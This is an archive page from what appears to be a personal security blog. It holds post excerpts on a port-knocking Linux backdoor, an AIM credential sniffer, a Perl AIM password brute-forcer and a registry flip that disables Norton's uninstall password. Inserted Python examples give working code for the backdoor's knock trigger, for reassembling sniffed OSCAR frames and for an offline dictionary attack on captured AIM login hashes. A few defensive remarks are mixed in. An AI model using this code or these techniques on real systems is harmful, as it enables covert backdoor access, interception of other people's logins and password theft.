Author Archives: twrightson

Linux Stealthy Backdoor using portknocking technique

Wrote this program back in 2004 and had posted it using a pseudonym. I cleaned it up a tiny bit, and it is fully functional. The backdoor puts the interface in promiscuous mode and does not open a listen()ing socket until it sees 5 packets on port 5000 within a 60-second period. At […]
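The trigger logic described above (5 packets to port 5000 inside 60 seconds before anything listens), written out as an added example. This is not the backdoor's own source; it is a sliding-window counter fed with (timestamp, destination port) pairs, and the packet lists at the bottom are constructed to show one sequence that fires and one that is too slow.

```python
"""Port-knock trigger: arm only after COUNT packets hit PORT within WINDOW seconds.
Added example, not the original backdoor's code."""
from collections import deque

KNOCK_PORT = 5000      # values taken from the post
KNOCK_COUNT = 5
KNOCK_WINDOW = 60.0    # seconds


class KnockTrigger:
    """Sliding-window counter: keeps the timestamps of recent packets seen on
    the knock port and fires once KNOCK_COUNT of them fall inside the window."""

    def __init__(self, port=KNOCK_PORT, count=KNOCK_COUNT, window=KNOCK_WINDOW):
        self.port, self.count, self.window = port, count, window
        self.hits = deque()
        self.armed = False

    def observe(self, ts, dst_port):
        """Feed one packet (timestamp in seconds, destination port).
        Returns True on the packet that completes the knock sequence."""
        if self.armed or dst_port != self.port:
            return False
        self.hits.append(ts)
        # Forget hits older than the window, measured back from this packet.
        while self.hits and ts - self.hits[0] > self.window:
            self.hits.popleft()
        if len(self.hits) >= self.count:
            self.armed = True          # this is where the real tool would call listen()
            self.hits.clear()
            return True
        return False


def first_trigger(packets, **kw):
    """Run a packet list of (ts, dst_port) tuples through a fresh trigger and
    return the timestamp at which it armed, or None if it never did."""
    trig = KnockTrigger(**kw)
    for ts, port in packets:
        if trig.observe(ts, port):
            return ts
    return None


# Constructed samples (not captured traffic). Packets to other ports are ignored;
# the second list spreads 5 knocks over 100 s, so no 60 s window holds all 5.
FAST_KNOCK = [(0.0, 5000), (1.0, 22), (2.0, 5000), (3.0, 5000), (10.0, 5000), (59.0, 5000)]
SLOW_KNOCK = [(0.0, 5000), (25.0, 5000), (50.0, 5000), (75.0, 5000), (100.0, 5000)]

if __name__ == "__main__":
    print(first_trigger(FAST_KNOCK))   # 59.0
    print(first_trigger(SLOW_KNOCK))   # None
```

Two practitioner notes. Because the interface is in promiscuous mode, the sniffer also sees knocks addressed to other hosts on the segment, so a real implementation should match on its own destination address as well as the port. From the defender's side, the promiscuous flag itself is the cheapest indicator: a host whose NIC shows PROMISC with no sniffer you deployed deserves a look, and so does a new listening socket that appears without a corresponding service start.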

Three ways to count to 255

As an easy reference, here are three ways to generate an IP address list for use with other scripts, using three common scripting methods.

1. Windows For command

Command: FOR /L %variable IN (start,step,end) DO command [command-parameters]

Example: for /L %I IN (1,1,255) DO echo 192.168.1.%I >> IPs.txt

(Inside a batch file the variable is written as %%I.)

2. Bash Shell

Example: for (( i=1; i<=5; i++)); […]

Win32 tcp connect() skeleton

Very simple example of using winsock to connect to a chosen port. Grabbed most of the source from gandalf's whois.c, so thank you gandalf. Sends the 3rd command line argument over the socket, prints the data received and then quits. Test it the same way you would telnet to an SMTP server on port 25, sending 'helo […]

Brute Force AIM Password Perl Script – from Aimsniff Authentication Dump

Here's the Perl script to brute force an AIM password using the challenge code and response hash dumped by Aimsniff. It is very surprising how fast it is, especially considering it's just using an interpreted language. Best thing would be to use a dictionary creator and go to town. Benchmark it by putting your password at […]

Win32 EICAR Creator

Source and Executable Here

I had posted earlier about the EICAR test file. Threw together a simple prog to spit out the test string to any location for testing of antivirus programs. Usage: eicar.exe . Let me know if it comes in handy, I'll show an example of some creative uses later.

Aimsniff v0.2 – includes authentication dump

Source Code Here

Fixed up some of the code so that we get less garble on certain packets. We still see it sometimes, and it appears to be either retransmitted or fragmented packets; need to do some more debugging to find out. Newest feature is dumping the authentication challenge and response hash. Both of these […]
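The "garble" on some packets is what a sniffer sees when it decodes each TCP segment on its own: OSCAR wraps everything in FLAP frames, and a frame can be split across segments, several frames can share one segment, and a retransmitted segment repeats data already printed. The example below is added here and is not Aimsniff's code. It assumes the FLAP header layout from the published OSCAR documentation (a 0x2A marker byte, a channel byte, a 16-bit sequence number and a 16-bit payload length, all big-endian) and buffers one direction of a TCP flow until whole frames are available; the sample bytes are constructed.

```python
"""Reassemble OSCAR FLAP frames from a stream of TCP segments.
Added example, not Aimsniff's source. Header layout assumed from OSCAR docs."""
import struct

FLAP_MARKER = 0x2A
FLAP_HDR = struct.Struct("!BBHH")   # marker, channel, sequence, payload length


class FlapReassembler:
    """One instance per direction of one TCP connection (FLAP sequence numbers
    are kept separately by each side)."""

    def __init__(self):
        self.buf = bytearray()
        self.next_seq = None

    def feed(self, segment):
        """Append one TCP payload and return the complete frames now available
        as (channel, seq, payload) tuples. A trailing partial frame stays
        buffered; a frame whose sequence number is behind the expected one is
        treated as a retransmission and dropped rather than decoded twice."""
        self.buf += segment
        frames = []
        while len(self.buf) >= FLAP_HDR.size:
            marker, chan, seq, length = FLAP_HDR.unpack_from(self.buf)
            if marker != FLAP_MARKER:
                # Lost sync (capture started mid-frame): skip a byte and retry.
                del self.buf[0]
                continue
            if len(self.buf) < FLAP_HDR.size + length:
                break                      # wait for the rest of this frame
            payload = bytes(self.buf[FLAP_HDR.size:FLAP_HDR.size + length])
            del self.buf[:FLAP_HDR.size + length]
            if self.next_seq is not None and ((seq - self.next_seq) & 0xFFFF) > 0x7FFF:
                continue                   # older than expected: retransmission
            self.next_seq = (seq + 1) & 0xFFFF
            frames.append((chan, seq, payload))
        return frames


def flap(chan, seq, payload):
    """Build one FLAP frame (used only to construct the sample stream)."""
    return FLAP_HDR.pack(FLAP_MARKER, chan, seq, len(payload)) + payload


# Constructed stream: two frames delivered as three segments that split the
# second frame, followed by a retransmission of the first one.
F1 = flap(1, 0x1000, b"\x00\x00\x00\x01")
F2 = flap(2, 0x1001, b"SNAC-payload-bytes")
SEGMENTS = [F1 + F2[:3], F2[3:10], F2[10:], F1]


def reassemble(segments):
    """Run a list of segments through one reassembler and collect the frames."""
    r = FlapReassembler()
    out = []
    for s in segments:
        out.extend(r.feed(s))
    return out


if __name__ == "__main__":
    for chan, seq, payload in reassemble(SEGMENTS):
        print(f"channel={chan} seq={seq:#06x} len={len(payload)} {payload!r}")
```

The sequence-number check only catches the simple case of a whole frame being repeated. If a segment is lost in the capture (not on the wire), the stream desynchronises at the next header, so a sniffer that wants to be robust should track TCP sequence numbers per flow and reorder or gap-fill before handing bytes to the FLAP layer.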

AIM OSCAR Authentication Process

So I wanted to include a routine in the AIM sniffer to dump the authentication challenge and response hash to allow for brute forcing of the user's password. Took some time to find the correct documentation on the OSCAR protocol, but once I did it was pretty straightforward. Below is the basic process. 1. Server […]
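The brute force that the two AIM posts above (the Perl script and this description of the challenge/response exchange) rely on, as an added example rather than the author's Perl. The hash construction is an assumption taken from the OSCAR MD5 login as implemented by open clients such as libpurple: the server sends a random key (the challenge) and the client replies with MD5(key + password + "AOL Instant Messenger (SM)"); some clients hash MD5(password) in place of the plain password, so both variants are tried. The challenge, captured hash and word lists are constructed, and the Aimsniff output format is not assumed.

```python
"""Offline dictionary attack on an OSCAR MD5 challenge/response.
Added example; the hash formula is an assumption from public OSCAR client code."""
import hashlib
import itertools

MAGIC = b"AOL Instant Messenger (SM)"   # assumed constant from the OSCAR MD5 login


def oscar_response(key: bytes, password: bytes, prehashed: bool = False) -> str:
    """Hex MD5 response a client would send for this key and password.
    prehashed=True models clients that hash MD5(password) instead of the password."""
    inner = hashlib.md5(password).digest() if prehashed else password
    return hashlib.md5(key + inner + MAGIC).hexdigest()


def crack(key, target_hex, candidates):
    """Return (password, variant) for the first candidate whose response equals
    target_hex, or None. One MD5 per guess per variant: that is why even an
    interpreted brute force is fast, and why this scheme offers little protection
    once the exchange has been sniffed."""
    target = target_hex.lower()
    for pw in candidates:
        for prehashed in (False, True):
            if oscar_response(key, pw, prehashed) == target:
                return pw.decode(), "md5(password)" if prehashed else "plain"
    return None


def charset_words(alphabet, max_len):
    """Minimal 'dictionary creator': every string over alphabet up to max_len."""
    for n in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=n):
            yield "".join(combo).encode()


# Constructed: a challenge as the sniffer would capture it, and the hash a
# client using the password 'dog1' would answer with.
CHALLENGE = b"1234567890abcdef"
CAPTURED = oscar_response(CHALLENGE, b"dog1")
WORDLIST = [b"password", b"aim", b"dog1", b"letmein"]

if __name__ == "__main__":
    print(crack(CHALLENGE, CAPTURED, WORDLIST))                    # ('dog1', 'plain')
    print(crack(CHALLENGE, CAPTURED, charset_words("dgo1", 4)))    # ('dog1', 'plain')
```

The point to take from this is not the speed but the shape of the scheme: the only secret mixed into the hash is the password, the key is sent in the clear, and there is no slow KDF, so one passive capture hands the attacker an offline guessing problem. Protocols that want to survive sniffing either run inside TLS or use a PAKE, where the exchange does not give an eavesdropper anything to hash guesses against.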

Aimsniff v0.1

Source Code Here

Here's a simple console AIM sniffer I had written a while ago. Great for getting familiar with libpcap. The output is not necessarily pretty, but great for those impromptu sniffing sessions. If you look at the source code, I hardly commented this code at all, which is a shame because the OSCAR […]

Norton / Symantec Uninstall Password…. wtf?

So apparently if you want to uninstall Norton Antivirus and you get prompted for a password, you can disable this as easily as you can change your background. All you need to do is flip the following registry value from 1 to 0:

HKEY_LOCAL_MACHINE\SOFTWARE\INTEL\LANDesk\VirusProtect6\CurrentVersion\Administrator Only\Security\VPuninstallpassword

(Writing under HKEY_LOCAL_MACHINE needs local administrator rights, so the password only ever stood in the way of non-admin users.) This seems to beg the question… wtf? […]

Cisco Poller Perl Script

Very extensible Perl script to periodically poll Cisco devices via telnet, send any commands to the device and save the output.